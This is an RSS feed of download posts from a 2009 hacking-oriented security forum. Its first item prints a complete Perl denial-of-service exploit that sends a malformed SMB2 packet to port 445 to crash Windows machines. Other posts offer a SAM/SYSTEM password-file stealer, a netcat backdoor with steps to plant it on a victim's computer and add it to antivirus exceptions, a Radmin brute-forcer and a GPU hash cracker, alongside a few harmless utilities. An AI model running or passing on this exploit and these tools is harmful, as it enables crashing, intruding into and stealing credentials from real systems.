<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
	<title>Last 10 Downloads</title>
	<description></description>
	<link>http://www.governmentsecurity.org/forum/index.php</link>
	<pubDate>Thu, 10 Sep 2009 02:28:20 +0000</pubDate>
	<ttl>10</ttl>
	<item>
		<title>Smb2 Nuke</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32074</link>
		<description><![CDATA[you probably all have seen the python code making the rounds yesterday<br />
i was to lazy to install python so i converted it to perl and assembly<br />
<br />
<a href='http://illmob.org/smb2nuke.exe' class='bbc_url' title='External link' rel='nofollow external'>http://illmob.org/smb2nuke.exe</a><br />
<br />
peep the old skool winuke95 throwback gui <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
http://img35.imageshack.us/img35/8003/winnuke09.jpg<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>#!/usr/bin/perl<br />
## smb2nuke by illwill<br />
## translated to perl because i didnt feel like installing python<br />
## Usage: smb2nuke.pl IPaddress (i.e. smb2nuke.pl 192.168.0.1)<br />
####################################################################################<br />
use IO::Socket;<br />
<br />
$nuke = "&#092;x00&#092;x00&#092;x00&#092;x90".<br />
"&#092;xff&#092;x53&#092;x4d&#092;x42".<br />
"&#092;x72&#092;x00&#092;x00&#092;x00".<br />
"&#092;x00&#092;x18&#092;x53&#092;xc8".<br />
"&#092;x00&#092;x26".<br />
"&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;xff&#092;xff&#092;xff&#092;xfe".<br />
"&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x6d&#092;x00&#092;x02&#092;x50&#092;x43&#092;x20&#092;x4e&#092;x45&#092;x54".<br />
"&#092;x57&#092;x4f&#092;x52&#092;x4b&#092;x20&#092;x50&#092;x52&#092;x4f&#092;x47&#092;x52&#092;x41&#092;x4d&#092;x20&#092;x31".<br />
"&#092;x2e&#092;x30&#092;x00&#092;x02&#092;x4c&#092;x41&#092;x4e&#092;x4d&#092;x41&#092;x4e&#092;x31&#092;x2e&#092;x30&#092;x00".<br />
"&#092;x02&#092;x57&#092;x69&#092;x6e&#092;x64&#092;x6f&#092;x77&#092;x73&#092;x20&#092;x66&#092;x6f&#092;x72&#092;x20&#092;x57".<br />
"&#092;x6f&#092;x72&#092;x6b&#092;x67&#092;x72&#092;x6f&#092;x75&#092;x70&#092;x73&#092;x20&#092;x33&#092;x2e&#092;x31&#092;x61".<br />
"&#092;x00&#092;x02&#092;x4c&#092;x4d&#092;x31&#092;x2e&#092;x32&#092;x58&#092;x30&#092;x30&#092;x32&#092;x00&#092;x02&#092;x4c".<br />
"&#092;x41&#092;x4e&#092;x4d&#092;x41&#092;x4e&#092;x32&#092;x2e&#092;x31&#092;x00&#092;x02&#092;x4e&#092;x54&#092;x20&#092;x4c".<br />
"&#092;x4d&#092;x20&#092;x30&#092;x2e&#092;x31&#092;x32&#092;x00&#092;x02&#092;x53&#092;x4d&#092;x42&#092;x20&#092;x32&#092;x2e".<br />
"&#092;x30&#092;x30&#092;x32&#092;x00";<br />
<br />
print "-&gt;smb2nuke.pl&lt;-$/$/";<br />
print "-&gt; Trying to Connect to $ARGV[0]:445$/";<br />
$socket = IO::Socket::INET-&gt;new(<br />
			PeerAddr 	=&gt; "$ARGV[0]", <br />
			PeerPort 	=&gt; '445', <br />
			Proto 		=&gt; 'tcp',<br />
			Timeout 	=&gt; '45') or die "-!&gt; Can't connect to $ARGV[0]:445 -&gt; $!&#092;r&#092;n";<br />
print "-&gt; Connected to $ARGV[0]:445$/";<br />
$socket-&gt;autoflush();<br />
<br />
print $socket "$nuke";<br />
<br />
print "-&gt; Box should be nuked.$/"</div></div>]]></description>
		<pubDate>Thu, 10 Sep 2009 02:28:20 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32074</guid>
	</item>
	<item>
		<title>Trace Any Process With Free Tool</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32058</link>
		<description><![CDATA[Trace all your windows running processes, i.e what they do where connect , what they open and send:<br />
Tool is free SO MODERATORS stop deleting my messages.<br />
<a href='http://www.hotlinkfiles.com/files/2786572_fpyai/processmonitor26.zip' class='bbc_url' title='External link' rel='nofollow external'>http://www.hotlinkfiles.com/files/2786572_fpyai/processmonitor26.zip</a><br />
Best Regards<br />
Nick Niceman]]></description>
		<pubDate>Mon, 31 Aug 2009 22:29:04 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32058</guid>
	</item>
	<item>
		<title>Batch2Exe</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32044</link>
		<description><![CDATA[Okay, before anyone flames me ill say that i know this is offtopic, and if anyone knows where this should be, or if a mod can move this, i'd appreciate it.<br />
<br />
 But basically. I cant do anything. i cant even PM people. and i need this file very bad.<br />
<br />
<a href='http://www.governmentsecurity.org/forum/index.php?showtopic=14767' class='bbc_url' title='External link' rel='nofollow external'>http://www.governmentsecurity.org/forum/index.php?showtopic=14767</a><br />
<br />
help me please. and thank you.]]></description>
		<pubDate>Thu, 27 Aug 2009 05:56:18 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32044</guid>
	</item>
	<item>
		<title>Simple Flash dictionary maker</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31785</link>
		<description><![CDATA[you just need a browser with Flash player: <a href='http://www.ddd.ee/dmaker/dmaker.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.ddd.ee/dmaker/dmaker.html</a>]]></description>
		<pubDate>Fri, 22 May 2009 16:53:05 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31785</guid>
	</item>
	<item>
		<title>Quick SAM/SYSTEM Stealer</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31631</link>
		<description><![CDATA[I made a quick batch file which, when booted, will mount ntfs drives and steal the SAM and SYSTEM files. I used DOS stuff to make a memory stick bootable, used NTFS4DOS to mount the partitions and just plain COPY to copy the files. You can put this on a floppy (you will have to delete some files, it is a bit big) and boot it, all you need to do it type 'yes' when it asks. I timed this and it takes 28 seconds in total. You can then use the SAM and SYSTEM files it steals with CAIN to crack the users and passwords. It saves the file as SAM+drive letter it took it from (e.g SAMF if it came from the F:&#092; drive) It is the same with the SYSTEM file but with SYSTEM instead of SAM.<br />
<br />
Comments please<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5056" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5056" title="">STEALER.rar</a> <span class='desc'><strong>(1.29MB)</strong></span>
<br /><span class="desc info">: 90</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sat, 04 Apr 2009 11:17:35 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31631</guid>
	</item>
	<item>
		<title>CUDA Mysql/Sha1 Cracker</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31591</link>
		<description><![CDATA[Project overhauled, ATI support + mssql support done:)<br />
<br />
So, i finally got around writing a CUDA Mysql/sha1/mssql hash cracker.<br />
I'm releasing it here. Its free as in freedom <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/tongue.gif' class='bbc_emoticon' alt=':P' /> You're NOT welcome to use this in any commercial products. Feel free to use this code in any free open source software tho <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/wink.gif' class='bbc_emoticon' alt=';)' /> <br />
<br />
600mhashes/s on each 4870x2 in my system makes 2.4Bhashes/s on SHA1:)<br />
There's one bug left, the NVIDIA version does not support plaintext lengths 1-3 properly, i might need some halp fixing this. I'm probably not going to spend too much time on this project for a while <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/tongue.gif' class='bbc_emoticon' alt=':P' /> (Feel free to send me mail with an idea on how to fix this tho )<br />
<br />
To compile the ATI kernel, you'll need to install my set of compiler hacks, because the ATI brook+ compiler is just plain shitty, and i didn't feel like copying my code 30+ times.<br />
<br />
Todo:<br />
-network support.<br />
-more optimization<br />
-some cleaning up<br />
<br />
Binaries and source included.<br />
<br />
If it's slow, feel free to mess around with it and recompile it:)<br />
<br />
If it doesn't work: try installing nvidia's CUDA and ati's Brook+ (runtimes included now, so it SHOULD work.)<br />
<br />
<br />
And yes i know i use smileys way too much.<br />
<br />
Edit:<br />
<pre class='prettyprint'>Made the ATI kernel compatible with newer versions of the driver. Fixed the NVIDIA kernel (uninitialized variable DATA1). </pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Uploaded the wrong RAR file, included the wrong ATI kernel. fixed now.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> 430% increase in speed on NVIDIA, 50% increase on ATI. Pretty much all bugs fixed.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> Added a minidump system. For those people that experience crashes, SEND MINIDUMPS.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> Damn ATI for adding TLS for no reason in their SDK. It SHOULD REALLY REALLY BE FIXED NOW.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Apperantly statically declared TLS caused a lot of bugs on operating systems lower than vista. Got that fixed now.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Another bug fixed + nvidia code optimized a bit.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug in the NVIDIA kernel, thanks to budden for reporting it. Also note: CUDA HATES UPX!</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>I'd like to shoutout to: budden from the 3.14 forums, and darkwerewolf (my mentor).</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>ATI support added. Project rewritten to modular layout. Code needs some cleaning up and optimisation now. MSSQL support added.</pre><br />
<br />
<br />
Edit:<br />
<br />
<pre class='prettyprint'>Added -minlength and -maxlength commandline parameters.
			 
			 The commandline parameters are:
			 Set the output file : -outfile file.txt
			 Set the hash input file: -hashes file.txt
			 Set the charset file	: -charset file.txt
			 Set the min pass len :-minlength 10
		 
			 
			 And, if the hashes in the file are mysql hashes, specify the commandline option -mysql.
			 For mssql, set the commandline option -mssql.
		 
			 For the format of these files: The hash input file should be in the following format: HASH&#092;r&#092;n, so the file ends with a newline. See the archive for an example.
			 
			 The charset file should contain no newlines. Only a valid character set.</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug that would make the program unable to scan the last set of passwords of each block correctly. (Hackish fix, should be cleaned up later).</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug that would make the program unable to scan beyond 5 character passwords (am i going f'ing blind?).</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>Multi GPU support added. Speed improved by approx 11%. Should work wonders on fast gpu's. Logging added. Send me some stats (mhashes/seconds) and logs!</pre><div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5112" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5112" title="">releasecracker.zip</a> <span class='desc'><strong>(1.73MB)</strong></span>
<br /><span class="desc info">: 14</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sat, 28 Mar 2009 20:35:51 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31591</guid>
	</item>
	<item>
		<title>Simple Backdoor</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31545</link>
		<description><![CDATA[Here is a very simple backdoor i made. It uses Netcat for windows which is included in the zip. You run the Netcat.exe file on the victim computer. You need access to the computer to do this, If you want it to start on boot run the Netcat.reg file. The Netcat.exe file was written using autohotkey and the .ahk file is the source thing. THIS IS NOT UNDETECTABLE!!!! You will need to log onto the victims computer, copy the files to C:&#092;WINDOWS&#092;system32&#092; folder and add BOTH files to antivirus exceptions, possibly even firewall exceptions. The only files you need to copy are nc.exe and Netcat.exe. The reg file must be run if you want it to start on startup. The backdoor shows up in task manager as nc.exe but if you change the filename(and the ahk file(then compile it)) it will show up as different. To connect you can use telnet(or netcat) or Putty, port 303. <br />
<br />
Please tell me what you think so i can improve it.<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5046" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5046" title="">Backdoor.zip</a> <span class='desc'><strong>(224.83K)</strong></span>
<br /><span class="desc info">: 117</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Wed, 18 Mar 2009 18:31:49 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31545</guid>
	</item>
	<item>
		<title>Novas Radmin Brute Force Attack .NET v1.0</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31179</link>
		<description><![CDATA[Novas Radmin Brute Force Attack .NET v1.0<br />
<br />
Designed for use with radmin &lt;= 2.0 it will attempt to connect and authenticate using passwords<br />
contained in password.txt, on successful authentication the application will write the details<br />
to a text file using the target as its filename. It does contain the ability to multithread<br />
different IP's though testing produced varying results and advise against.<br />
<br />
Prerequisites: .Net framework 3.<br />
<br />
<br />
Wu-tang can (filtered) himself, don't steal others work for your glory! everyone else enjoy.<br />
Distrubuted via governmentsecurity.org<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5009" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5009" title="">nrbfNET.rar</a> <span class='desc'><strong>(448.03K)</strong></span>
<br /><span class="desc info">: 334</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sun, 11 Jan 2009 15:45:20 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31179</guid>
	</item>
	<item>
		<title>DSplit GUI</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30846</link>
		<description><![CDATA[I made a simple little GUI for DSplit, DSplit is included in the install but it has been renamed to dsp.exe you can replace my dsp.exe with your DSplit.exe but you will have to reanme it dsp.exe.<br />
To use this all you have to do is click the buttons.<br />
To pick the file that you want to split click the very open button then find the file you want to split.<br />
Then when you have the program you want to split choose a project name. This will make a sub folder in the GUI folder so it will not flood your desktop or where ever you have the file you want to split.<br />
then click Start Procedure and it will copy the dsp.exe and your file into that folder.<br />
then you can change the values and click split.<br />
if you do not want to just highlight and delete the extra files it makes you can use the Clear Folder it will delete everything in the folder with your permission but the backup in it will restore the file-to-split and the dsplit as long as the program is open so that is ok.<br />
Sorry if this information is kind of bunched together it is currently 12:57 AM here and I am very tired.<br />
Hope you like and please post comments.<br />
P.S. The download link is the installer version(made with installsheild) of this.<br />
<pre class='prettyprint'>http&#58;//www.youshare.com/Guest/dd8623e5c73f988d.zip.html</pre>]]></description>
		<pubDate>Sat, 22 Nov 2008 06:29:49 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30846</guid>
	</item>
	<item>
		<title>DosDrop 2.1</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30742</link>
		<description><![CDATA[===========================================================<br />
description: a program that drops the current folders' path <br />
             into a cmd prompt, works on nt/2k/xp/2k3<br />
             Vista gives you an "Elevated" Command Prompt<br />
===========================================================<br />
features:<br />
*only 2.5kb<br />
<br />
<br />
Instructions:<br />
  unzip the zipfile into a folder<br />
  open dosdrop.exe<br />
  BAM! ur done<br />
  now right click any folder and choose DOSDrop and it <br />
  will drop you to that folders path in a 'h4x0r-like'<br />
  command prompt. why? Because the matrix made black<br />
  and green consoles cool.  <img src='/forum/public/style_emoticons/default/ph34r.gif' class='bbc_emoticon' alt=':ph34r:' /> <br />
===========================================================<br />
<br />
please let me know if any bugs , i don't have vista to test on<br />
but it should work by giving you an elevated cmd prompt<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4969" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4969" title="">DosDrop2.1.zip</a> <span class='desc'><strong>(1.25K)</strong></span>
<br /><span class="desc info">: 63</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Tue, 11 Nov 2008 05:37:35 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30742</guid>
	</item>
</channel>
</rss>